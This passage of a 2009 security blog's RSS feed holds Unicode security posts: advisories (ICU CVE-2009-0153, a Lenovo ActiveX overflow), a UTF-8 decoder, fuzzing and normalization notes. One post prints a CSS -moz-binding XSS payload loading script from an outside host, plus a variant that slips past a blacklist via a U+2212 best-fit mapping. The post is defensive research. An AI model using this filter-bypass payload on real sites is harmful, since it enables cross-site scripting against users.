src='https://blogger.googleusercontent.com/tracker/3867003125940558889-4299647340174693096?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/06/advisory-international-components-for.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-8523189811117200236</guid><pubDate>Sat, 23 May 2009 21:19:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.920-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><title>Major applications fail to include full Unicode support</title><description>As I’ve found with most of the major Web-apps out there, including social media giants like Facebook and others, Unicode support is far from complete. 
I’m not a big MySQL guy, but have been building some stuff lately and ran into this:&lt;br/&gt;&lt;br/&gt;&lt;a href="http://dev.mysql.com/doc/refman/6.0/en/faqs-cjk.html#qandaitem-22-11-1-16"&gt;http://dev.mysql.com/doc/refman/6.0/en/faqs-cjk.html#qandaitem-22-11-1-16&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;Basically, MySQL versions &amp;lt; 6.0.4 don’t support characters outside the BMP (Basic Multilingual Plane), which seems to be a common pattern for a lot of software. The BMP covers code points 0x0000 to 0xFFFF, but Unicode stretches far beyond that, to 0x10FFFF. It makes sense, I suppose: the BMP holds the most commonly used scripts, and the supplementary characters beyond it are usually considered rare.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-8523189811117200236?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/05/major-applications-fail-to-include-full.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-5193395518262590003</guid><pubDate>Fri, 15 May 2009 21:18:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.791-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>advisory</category><category domain='http://www.blogger.com/atom/ns#'>ICU</category><title>Advisory: International Components for Unicode CVE-2009-0153</title><description>Big ones from Apple today: &lt;a href="http://support.apple.com/kb/HT3549"&gt;http://support.apple.com/kb/HT3549&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;CVE-ID: CVE-2009-0153&lt;br/&gt;&lt;br/&gt;Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6&lt;br/&gt;&lt;br/&gt;Impact: Maliciously crafted content may bypass website filters and result in cross-site scripting&lt;br/&gt;&lt;br/&gt;Description: An implementation issue exists in 
ICU’s handling of certain character encodings. Using ICU to convert invalid byte sequences to Unicode may result in over-consumption, where trailing bytes are considered part of the original character. This may be leveraged by an attacker to bypass filters on websites that attempt to mitigate cross-site scripting. This update addresses the issue through improved handling of invalid byte sequences. This issue does not affect systems prior to Mac OS X v10.5. Credit to Chris Weber of Casaba Security for reporting this issue.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-5193395518262590003?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/05/advisory-international-components-for.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-4836823575027994099</guid><pubDate>Thu, 07 May 2009 21:15:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.786-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>best-fit</category><category domain='http://www.blogger.com/atom/ns#'>testing</category><category domain='http://www.blogger.com/atom/ns#'>security</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><title>Unicode security attacks and test cases – Best-fit mappings and String
transformations</title><description>Best-fit mappings are another complex topic in Unicode, easily overlooked or misunderstood. On the defensive side, if you can only remember two things, remember these:&lt;br/&gt;&lt;ol&gt;&lt;br/&gt;&lt;li&gt;Converting &lt;strong&gt;to Unicode is safe&lt;/strong&gt;.&lt;/li&gt;&lt;br/&gt;&lt;li&gt;Converting &lt;strong&gt;between legacy character sets is dangerous&lt;/strong&gt;.&lt;/li&gt;&lt;br/&gt;&lt;/ol&gt;&lt;br/&gt;Ah, forget it. Unfortunately it’s more complicated than that, because &lt;a href="http://www.lookout.net/2008/04/21/string-handling-when-marshalling-from-net-to-a-platform-invoke/"&gt;basic string handling&lt;/a&gt; can also trigger best-fit behavior even when you aren’t intentionally converting between encodings or charsets.&lt;br/&gt;&lt;br/&gt;The term &lt;strong&gt;best-fit mapping&lt;/strong&gt; describes how a character should be represented when it doesn’t have an explicit place in a destination character set.&lt;br/&gt;&lt;br/&gt;I’ve actually pulled off some interesting cross-site scripting attacks by exploiting best-fit mappings. In 2008 I was testing a popular social networking app. They had just implemented a new profile editor complete with user-controlled CSS. They were smart, though: they knew that stuff like this would lead to XSS:&lt;br/&gt;&lt;br/&gt;&lt;code&gt;-moz-binding: url(&lt;a href="http://nottrusted.com/gotcha.xml#xss"&gt;http://nottrusted.com/gotcha.xml#xss&lt;/a&gt;)&lt;/code&gt;&lt;br/&gt;&lt;br/&gt;So they implemented some sort of blacklist because, well, that’s common. Anyway, somewhere in the call stack of their parsing and filtering, the string I passed in was being transformed. To get to the point, I eventually figured out I could manipulate the input with a character that would pass through their filter and come out transformed into the character I needed. 
The input:&lt;br/&gt;&lt;br/&gt;&lt;code&gt;−moz−binding: url(&lt;a href="http://nottrusted.com/gotcha.xml#xss"&gt;http://nottrusted.com/gotcha.xml#xss&lt;/a&gt;)&lt;/code&gt;&lt;br/&gt;&lt;br/&gt;The first character here is U+2212, the MINUS SIGN (−) which was being transformed through an apparent best-fit mapping into U+002D, or -.&lt;br/&gt;&lt;br/&gt;The &lt;a href="http://websecuritytool.codeplex.com/"&gt;Watcher security testing tool&lt;/a&gt; I released a few months ago has a new check coming to detect string transformations like this. My plan was to detect spots where strings can be manipulated to pull off attacks like I just described. Does anyone want to test this, and are there any other good stories about manipulating best-fit mappings to pull off attacks?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-4836823575027994099?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/05/unicode-security-attacks-and-test-cases.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>3</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-6684314918597917975</guid><pubDate>Fri, 24 Apr 2009 21:14:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.842-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>UTF8</category><category domain='http://www.blogger.com/atom/ns#'>encodings</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><title>Ultrafast UTF-8 decoder by Bjoern Hoehrmann</title><description>I believe this is still getting tested by several parties, but it’s obviously a highly optimized implementation of a UTF-8 decoder. 
Bjoern Hoehrmann released his &lt;a href="http://bjoern.hoehrmann.de/utf-8/decoder/dfa/"&gt;Flexible and Economical UTF-8 Decoder &lt;/a&gt;recently, check it out:&lt;br/&gt;&lt;code&gt;// Copyright (c) 2008-2009 Bjoern Hoehrmann &lt;/code&gt;&lt;br/&gt;&lt;code&gt;// See &lt;a href="http://bjoern.hoehrmann.de/utf-8/decoder/dfa/"&gt;http://bjoern.hoehrmann.de/utf-8/decoder/dfa/&lt;/a&gt; for details.&lt;/code&gt;&lt;br/&gt;&lt;br/&gt;#define UTF8_ACCEPT 0&lt;br/&gt;#define UTF8_REJECT 1&lt;br/&gt;&lt;br/&gt;static const uint8_t utf8d[] = {&lt;br/&gt;0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, // 00..1f&lt;br/&gt;0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, // 20..3f&lt;br/&gt;0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, // 40..5f&lt;br/&gt;0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, // 60..7f&lt;br/&gt;1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9, // 80..9f&lt;br/&gt;7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7, // a0..bf&lt;br/&gt;8,8,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2, // c0..df&lt;br/&gt;0xa,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x4,0x3,0x3, // e0..ef&lt;br/&gt;0xb,0x6,0x6,0x6,0x5,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8, // f0..ff&lt;br/&gt;0x0,0x1,0x2,0x3,0x5,0x8,0x7,0x1,0x1,0x1,0x4,0x6,0x1,0x1,0x1,0x1, // s0..s0&lt;br/&gt;1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,0,1,0,1,1,1,1,1,1, // s1..s2&lt;br/&gt;1,2,1,1,1,1,1,2,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1, // s3..s4&lt;br/&gt;1,2,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,3,1,3,1,1,1,1,1,1, // s5..s6&lt;br/&gt;1,3,1,1,1,1,1,3,1,3,1,1,1,1,1,1,1,3,1,1,1,1,1,1,1,1,1,1,1,1,1,1, // s7..s8&lt;br/&gt;};&lt;br/&gt;&lt;br/&gt;uint32_t inline&lt;br/&gt;decode(uint32_t* state, uint32_t* codep, uint32_t byte) {&lt;br/&gt;uint32_t type = utf8d[byte];&lt;br/&gt;&lt;br/&gt;*codep = (*state != UTF8_ACCEPT) ?&lt;br/&gt;(byte &amp;amp; 0x3fu) | (*codep 
&amp;lt;&amp;lt; 6) :&lt;br/&gt;(0xff &amp;gt;&amp;gt; type) &amp;amp; (byte);&lt;br/&gt;&lt;br/&gt;*state = utf8d[256 + *state*16 + type];&lt;br/&gt;return *state;&lt;br/&gt;}&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-6684314918597917975?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/04/ultrafast-utf-8-decoder-by-bjoern.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-5708736620417905160</guid><pubDate>Thu, 23 Apr 2009 21:05:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.817-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>testing</category><category domain='http://www.blogger.com/atom/ns#'>test cases</category><category domain='http://www.blogger.com/atom/ns#'>security</category><category domain='http://www.blogger.com/atom/ns#'>fuzzing</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><title>Unicode security attacks and test cases – fuzzing with Unicode</title><description>When it comes to fuzzing parsers, protocols, and other software, I want the fuzzer to be capable of producing tests specific to Unicode. 
Here’s what it should do at a minimum:&lt;br/&gt;&lt;ul&gt;&lt;br/&gt;&lt;li&gt;Generate half of a surrogate pair (a lone surrogate) in UTF-8 or UTF-16&lt;/li&gt;&lt;br/&gt;&lt;li&gt;Generate ill-formed byte sequences for UTF-8 and UTF-16&lt;/li&gt;&lt;br/&gt;&lt;li&gt;Generate overlong UTF-8&lt;/li&gt;&lt;br/&gt;&lt;li&gt;Generate unassigned and reserved code points&lt;/li&gt;&lt;br/&gt;&lt;li&gt;Generate code points outside the valid range (above U+10FFFF)&lt;/li&gt;&lt;br/&gt;&lt;li&gt;Generate interesting control characters and characters with special meaning like the BOM, embedding, overrides, etc.&lt;/li&gt;&lt;br/&gt;&lt;/ul&gt;&lt;br/&gt;I’ve got some code that does most of these things. Maybe I should elaborate on them some more… Does Peach or another fuzzing framework provide this already?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-5708736620417905160?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/04/unicode-security-attacks-and-test-cases_23.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-1223659476986565569</guid><pubDate>Fri, 03 Apr 2009 21:03:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.601-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>software</category><category domain='http://www.blogger.com/atom/ns#'>testing</category><category domain='http://www.blogger.com/atom/ns#'>test cases</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><category domain='http://www.blogger.com/atom/ns#'>normalization</category><title>Unicode security attacks and test cases – Normalization expansion for
buffer overflows</title><description>Normalization, like casing operations, can change the number of characters and bytes in a string. In testing software, I want to know how to get the most bang for my buck – in other words, what’s the minimal input I can provide to cause the maximum character and byte expansion?&lt;br/&gt;&lt;br/&gt;First step: Figure out what normalization operation your input is going through – NFC, NFD, NFKC, or NFKD.&lt;br/&gt;&lt;br/&gt;Next step: Find the right input.&lt;br/&gt;&lt;br/&gt;For example, if I pass in a character like U+2177 SMALL ROMAN NUMERAL EIGHT (ⅷ), I’ve passed in a single ‘character’ that takes three bytes [E2, 85, B7] to encode in UTF-8. If that character passes through a compatibility normalization form like NFKC or NFKD, then it has a compatibility mapping from one code point to four: U+0076 U+0069 U+0069 U+0069. Now those are all ASCII characters, so bytewise I didn’t really expand all that much, just one byte (three to four), but I did gain three extra characters.&lt;br/&gt;&lt;br/&gt;There may well be better cases than this one; just take a look at the maximum expansion factor table, courtesy of the &lt;a href="http://unicode.org/faq/normalization.html#12"&gt;Unicode Normalization FAQ&lt;/a&gt;:&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-1223659476986565569?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/04/unicode-security-attacks-and-test-cases.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-8711529186238032083</guid><pubDate>Fri, 27 Mar 2009 21:01:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.928-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>advisory</category><category 
domain='http://www.blogger.com/atom/ns#'>ActiveX</category><title>Advisory: Lenovo/IBM ActiveX buffer overflow</title><description>CERT released the advisory for this issue, which I believe is not being fixed by Lenovo/IBM.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.kb.cert.org/vuls/id/340420"&gt;http://www.kb.cert.org/vuls/id/340420&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;This ActiveX control comes preinstalled on many Lenovo systems, and is also downloaded from the main page of their support site. It’s a nasty stack-based buffer overflow, and enterprises and other consumers should consider how to work around it.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-8711529186238032083?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/03/advisory-lenovoibm-activex-buffer.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item></channel></rss>
